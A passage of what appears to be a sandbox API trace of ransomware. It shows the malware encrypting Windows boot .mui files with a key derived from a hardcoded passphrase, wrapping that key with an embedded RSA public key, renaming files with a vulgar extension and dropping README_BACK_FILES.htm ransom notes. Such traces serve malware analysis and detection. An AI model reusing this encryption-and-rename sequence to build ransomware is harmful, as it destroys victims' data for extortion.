dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x28045d0) returned 1 [0139.741] CryptCreateHash (in: hProv=0x28045d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.741] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0139.741] CryptHashData (hHash=0x27ff4d8, pbData=0x5bcdb8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.741] CryptDeriveKey (in: hProv=0x28045d0, Algid=0x6610, hBaseData=0x27ff4d8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff258) returned 1 [0139.742] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.742] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.742] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2803b30) returned 1 [0139.742] CryptImportPublicKeyInfo (in: hCryptProv=0x2803b30, dwCertEncodingType=0x1, pInfo=0x2800170*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28001a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28001a8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff298) returned 1 [0139.742] CryptEncrypt (in: hKey=0x27ff298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.742] CryptEncrypt (in: hKey=0x27ff298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804438*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804438*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.742] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804438*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804438*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.743] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.743] CryptEncrypt (in: hKey=0x27ff258, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.743] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.744] CloseHandle (hObject=0xffffffff) returned 1 [0139.744] CloseHandle (hObject=0x5d54) returned 1 [0139.744] CopyFileA (lpExistingFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0139.748] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0139.750] DeleteFileA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.gsg")) returned 1 [0139.751] MoveFileA (lpExistingFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.fuck")) returned 0 [0139.751] CryptDestroyHash (hHash=0x27ff4d8) returned 1 [0139.751] CryptDestroyKey (hKey=0x27ff258) returned 1 [0139.751] CryptReleaseContext (hProv=0x28045d0, dwFlags=0x0) returned 1 [0139.752] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0139.752] FindClose (in: hFindFile=0x27ff218 | out: hFindFile=0x27ff218) returned 1 [0139.752] GetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\README_BACK_FILES.htm" (normalized: "c:\\boot\\pl-pl\\readme_back_files.htm")) returned 0xffffffff [0139.752] AreFileApisANSI () returned 1 [0139.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d750, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0139.752] CreateFileW (lpFileName="C:\\\\Boot\\pl-PL\\README_BACK_FILES.htm" (normalized: "c:\\boot\\pl-pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0139.754] GetFileType (hFile=0x5d50) returned 0x1 [0139.754] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0139.755] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0139.755] FindFirstFileA (in: lpFileName="C:\\\\Boot\\pt-BR\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff358 [0139.756] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.756] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.756] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.756] GetLastError () returned 0x0 [0139.756] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui")) returned 0x20 [0139.756] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0139.757] CreateFileA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.757] CreateFileA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.757] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.758] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803ee8) returned 1 [0139.760] CryptCreateHash (in: hProv=0x2803ee8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.760] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0139.760] CryptHashData (hHash=0x27ff218, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.760] CryptDeriveKey (in: hProv=0x2803ee8, Algid=0x6610, hBaseData=0x27ff218, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff258) returned 1 [0139.760] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.760] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.760] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2804080) returned 1 [0139.761] CryptImportPublicKeyInfo (in: hCryptProv=0x2804080, dwCertEncodingType=0x1, pInfo=0x27ffbc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27ffbf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27ffbf8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff518) returned 1 [0139.761] CryptEncrypt (in: hKey=0x27ff518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.761] CryptEncrypt (in: hKey=0x27ff518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804548*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804548*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.761] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804548*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804548*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.762] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.762] CryptEncrypt (in: hKey=0x27ff258, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.762] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.763] CloseHandle (hObject=0xffffffff) returned 1 [0139.763] CloseHandle (hObject=0x5d54) returned 1 [0139.763] CopyFileA (lpExistingFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0139.877] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0139.877] DeleteFileA (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.gsg")) returned 1 [0139.878] MoveFileA (lpExistingFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.fuck")) returned 0 [0139.879] CryptDestroyHash (hHash=0x27ff218) returned 1 [0139.879] CryptDestroyKey (hKey=0x27ff258) returned 1 [0139.879] CryptReleaseContext (hProv=0x2803ee8, dwFlags=0x0) returned 1 [0139.879] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.879] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.879] GetLastError () returned 0x5 [0139.879] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui")) returned 0x20 [0139.879] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0139.879] CreateFileA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.880] CreateFileA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.880] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.880] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x28045d0) returned 1 [0139.883] CryptCreateHash (in: hProv=0x28045d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.883] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0139.883] CryptHashData (hHash=0x27ff4d8, pbData=0x5bcdb8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.883] CryptDeriveKey (in: hProv=0x28045d0, Algid=0x6610, hBaseData=0x27ff4d8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff558) returned 1 [0139.883] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.883] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.883] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2804658) returned 1 [0139.884] CryptImportPublicKeyInfo (in: hCryptProv=0x2804658, dwCertEncodingType=0x1, pInfo=0x2800990*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28009c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28009c8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff598) returned 1 [0139.884] CryptEncrypt (in: hKey=0x27ff598, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.884] CryptEncrypt (in: hKey=0x27ff598, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804768*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804768*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.884] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804768*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804768*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.885] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.885] CryptEncrypt (in: hKey=0x27ff558, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.885] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.885] CloseHandle (hObject=0xffffffff) returned 1 [0139.885] CloseHandle (hObject=0x5d54) returned 1 [0139.886] CopyFileA (lpExistingFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0139.890] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0139.890] DeleteFileA (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.gsg")) returned 1 [0139.891] MoveFileA (lpExistingFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.fuck")) returned 0 [0139.892] CryptDestroyHash (hHash=0x27ff4d8) returned 1 [0139.892] CryptDestroyKey (hKey=0x27ff558) returned 1 [0139.892] CryptReleaseContext (hProv=0x28045d0, dwFlags=0x0) returned 1 [0139.892] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0139.892] FindClose (in: hFindFile=0x27ff358 | out: hFindFile=0x27ff358) returned 1 [0139.892] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\pt-br\\readme_back_files.htm")) returned 0xffffffff [0139.892] AreFileApisANSI () returned 1 [0139.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d7f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0139.892] CreateFileW (lpFileName="C:\\\\Boot\\pt-BR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\pt-br\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0139.893] GetFileType (hFile=0x5d50) returned 0x1 [0139.894] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0139.894] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0139.895] FindFirstFileA (in: lpFileName="C:\\\\Boot\\pt-PT\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff218 [0139.895] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.895] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.895] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.895] GetLastError () returned 0x0 [0139.895] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui")) returned 0x20 [0139.896] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0139.896] CreateFileA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.896] CreateFileA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.896] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.897] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x28045d0) returned 1 [0139.899] CryptCreateHash (in: hProv=0x28045d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.899] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0139.899] CryptHashData (hHash=0x27ff658, pbData=0x5bcef8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.899] CryptDeriveKey (in: hProv=0x28045d0, Algid=0x6610, hBaseData=0x27ff658, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff098) returned 1 [0139.899] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.899] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.899] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2803910) returned 1 [0139.900] CryptImportPublicKeyInfo (in: hCryptProv=0x2803910, dwCertEncodingType=0x1, pInfo=0x2800f40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800f70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800f78*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff558) returned 1 [0139.900] CryptEncrypt (in: hKey=0x27ff558, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.900] CryptEncrypt (in: hKey=0x27ff558, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2803cc8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2803cc8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.900] WriteFile (in: hFile=0x5d54, lpBuffer=0x2803cc8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2803cc8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.901] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.901] CryptEncrypt (in: hKey=0x27ff098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.901] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.901] CloseHandle (hObject=0xffffffff) returned 1 [0139.901] CloseHandle (hObject=0x5d54) returned 1 [0139.903] CopyFileA (lpExistingFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), bFailIfExists=0) returned 